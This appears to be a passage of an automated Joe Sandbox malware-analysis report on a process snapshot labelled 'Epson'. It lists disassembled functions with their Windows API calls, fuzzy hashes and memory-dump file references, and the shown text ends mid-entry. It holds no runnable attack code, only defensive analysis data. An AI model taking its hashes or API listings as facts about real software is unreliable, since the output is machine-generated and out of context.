                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                      • Opcode ID: af203d4f993191285b92e656bcf130fd127524af69f131a035408c836e353a71
                                                                                                                                                                                                                                      • Instruction ID: 83b9fc9506c0a3d6ad598e2a3d7bc3f45774a7bc96bb2e9b38339908ae94b4d1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af203d4f993191285b92e656bcf130fd127524af69f131a035408c836e353a71
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1219576601219AF9F10EFA9CC84DFA73ACEB493A07048425F915DB2A0DB74DD47DB60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FB81A9
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FB81CF
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00FB81D2
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00FB81F3
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 00FB81FC
                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00FB8216
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00FB8224
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                      • Opcode ID: 21a1a08fdd187a15dd04fd7e790bdb19681de0b6c9f9a92e59d296778863cd7a
                                                                                                                                                                                                                                      • Instruction ID: d7bd59c367f4ee73952c3be5ff7f0401d073ede0cba072f92195333b7430ab98
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21a1a08fdd187a15dd04fd7e790bdb19681de0b6c9f9a92e59d296778863cd7a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D217476600108BF9B10EFA9DC89DEA77ECEB493607048125F915CB2A0DA74EC42EB64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00FC0E99
                                                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FC0ED5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                      • Opcode ID: 5bbccde5bfdb25e7735cdb394aced3e733f3754896cac171285b024b0d34e364
                                                                                                                                                                                                                                      • Instruction ID: adcdc71e88c322d4357510fec611250fd3bce22d1aabbe67bc2eba80b1e76a59
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bbccde5bfdb25e7735cdb394aced3e733f3754896cac171285b024b0d34e364
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF214D7190030BEBDB208F65DD46F9A77A8EF54720F204A1DFCA5972D0DB709882EB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00FC0F6D
                                                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FC0FA8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                      • Opcode ID: 8340fd423611e3c71288df98b20fdfa3402908ff5da7eadaa78e17dce7b6d21e
                                                                                                                                                                                                                                      • Instruction ID: e53ea291a16fd15598df9d909b187e1f4caa9486cf6d21bbd9ef755bb6bdf301
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8340fd423611e3c71288df98b20fdfa3402908ff5da7eadaa78e17dce7b6d21e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1521803194034ADBEB208F688D46F9977A8BF56730F200A1DE9A1D72D1DB709891EB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F57873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F578B1
                                                                                                                                                                                                                                        • Part of subcall function 00F57873: GetStockObject.GDI32(00000011), ref: 00F578C5
                                                                                                                                                                                                                                        • Part of subcall function 00F57873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F578CF
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00FE4BB0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00FE4BBD
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00FE4BC8
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00FE4BD7
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00FE4BE3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                      • Opcode ID: 9067bbbe575f0eaf0cd0543fbd340c138f759e7f833b8c60e00124c1096dc60c
                                                                                                                                                                                                                                      • Instruction ID: 2d4f6148cb2609c328a916034c1e566592549c06a60fe2fe09730b6ecf78c7ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9067bbbe575f0eaf0cd0543fbd340c138f759e7f833b8c60e00124c1096dc60c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC1193B254021DBEEF119EA5CC85EE77F9DEF087A8F014111FA08A6090C776DC21ABA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F8DB23: _free.LIBCMT ref: 00F8DB4C
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8DBAD
                                                                                                                                                                                                                                        • Part of subcall function 00F82D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F8DB51,01021DC4,00000000,01021DC4,00000000,?,00F8DB78,01021DC4,00000007,01021DC4,?,00F8DF75,01021DC4), ref: 00F82D4E
                                                                                                                                                                                                                                        • Part of subcall function 00F82D38: GetLastError.KERNEL32(01021DC4,?,00F8DB51,01021DC4,00000000,01021DC4,00000000,?,00F8DB78,01021DC4,00000007,01021DC4,?,00F8DF75,01021DC4,01021DC4), ref: 00F82D60
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8DBB8
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8DBC3
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8DC17
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8DC22
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8DC2D
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8DC38
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                      • Instruction ID: 84efdc66d6664f3d49858f426389e1bc8b7baf2b195b5c3140f46b3dcba574af
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3112173541B04BAD560BBB0CC4BFCFBBDC9F54700F414C19B299AA192DB79B504A750
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FBE328
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 00FBE32F
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FBE345
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 00FBE34C
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FBE390
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00FBE36D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                      • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                      • Opcode ID: b467bfef1c2e12864164da1a477b895f2accde6c8e7bac6d7be8d247b7efa651
                                                                                                                                                                                                                                      • Instruction ID: 7dc0b2f09db0271e167ab55ab9919cc81e4facf7dff42c9a73740e5ff9cca0b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b467bfef1c2e12864164da1a477b895f2accde6c8e7bac6d7be8d247b7efa651
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E0186F690024CBFE7119BA4CDC9EE7776CD708300F004591B746EA441EA749E845F71
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00FC1322
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000,?), ref: 00FC1334
                                                                                                                                                                                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00FC1342
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FC1350
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FC135F
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FC136F
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 00FC1376
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3495660284-0
                                                                                                                                                                                                                                      • Opcode ID: 23beb8f1a714ab19b22e7ac1f21bfd776d1181bde552e56edae9e92f35ca8564
                                                                                                                                                                                                                                      • Instruction ID: 6dffd39158a9ffde732881b964467e8a364f215a2a2fb174fe3bdeb22c3ddb1a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23beb8f1a714ab19b22e7ac1f21bfd776d1181bde552e56edae9e92f35ca8564
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AF03C32442646BFD3425F54EE89BC6BB39FF05312F401025F21199CA087759474EF90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00FD281D
                                                                                                                                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00FD283E
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00FD284F
                                                                                                                                                                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00FD2938
                                                                                                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 00FD28E9
                                                                                                                                                                                                                                        • Part of subcall function 00FB433E: _strlen.LIBCMT ref: 00FB4348
                                                                                                                                                                                                                                        • Part of subcall function 00FD3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00FCF669), ref: 00FD3C9D
                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00FD2992
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3203458085-0
                                                                                                                                                                                                                                      • Opcode ID: 23b3fc2373fc6bfd496d18876b94c9ba766984108cad080cbc36ca4e45deba3f
                                                                                                                                                                                                                                      • Instruction ID: 3297bf08b1a0b459cb6c4f35c7d0c79ef7d015bd99f432582b4b5b6e1e59898a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23b3fc2373fc6bfd496d18876b94c9ba766984108cad080cbc36ca4e45deba3f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2EB1E531604300AFD320DF24C885F2AB7E6AF94324F58854DF55A4B3A2DB35ED46EB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00F8042A
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80446
                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00F8045D
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F8047B
                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00F80492
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F804B0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                                                                                                                      • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                      • Instruction ID: 5655fc7b3d473cca96116399796b265cd5abfb0f50a9595f76ac8ffbfd76e417
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B081F972A41706ABE764FF68CC81BEA73A8AF44330F64412AF511D7681EF74D908A794
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F78649,00F78649,?,?,?,00F867C2,00000001,00000001,8BE85006), ref: 00F865CB
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F867C2,00000001,00000001,8BE85006,?,?,?), ref: 00F86651
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F8674B
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00F86758
                                                                                                                                                                                                                                        • Part of subcall function 00F83B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F76A79,?,0000015D,?,?,?,?,00F785B0,000000FF,00000000,?,?), ref: 00F83BC5
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00F86761
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00F86786
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                                                                                      • Opcode ID: 3019ff77f61a0fa82b6ba01582f32e0fb2163b88fb0e94defe5b43170f260852
                                                                                                                                                                                                                                      • Instruction ID: dcd061d4e919faa1e93ee90278dc86fcdad39f2b81741e7674b2277c226a9378
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3019ff77f61a0fa82b6ba01582f32e0fb2163b88fb0e94defe5b43170f260852
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE51D572A00206AFEB25AE64CC86EEF77A9EB40764F144669FD14DA140EF35DC50A7A0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FDC10E,?,?), ref: 00FDD415
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: _wcslen.LIBCMT ref: 00FDD451
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: _wcslen.LIBCMT ref: 00FDD4C8
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: _wcslen.LIBCMT ref: 00FDD4FE
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FDC72A
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FDC785
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FDC7CA
                                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00FDC7F9
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FDC853
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00FDC85F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1120388591-0
                                                                                                                                                                                                                                      • Opcode ID: 715eeb154fa176a8ae073a993cf9905523abde1fffe47d414643aa6598cfdc3b
                                                                                                                                                                                                                                      • Instruction ID: 8e8a06bfffc9f2bfcb38f6a28f9e54734f4f189f8840c7401954edc3ea666fcf
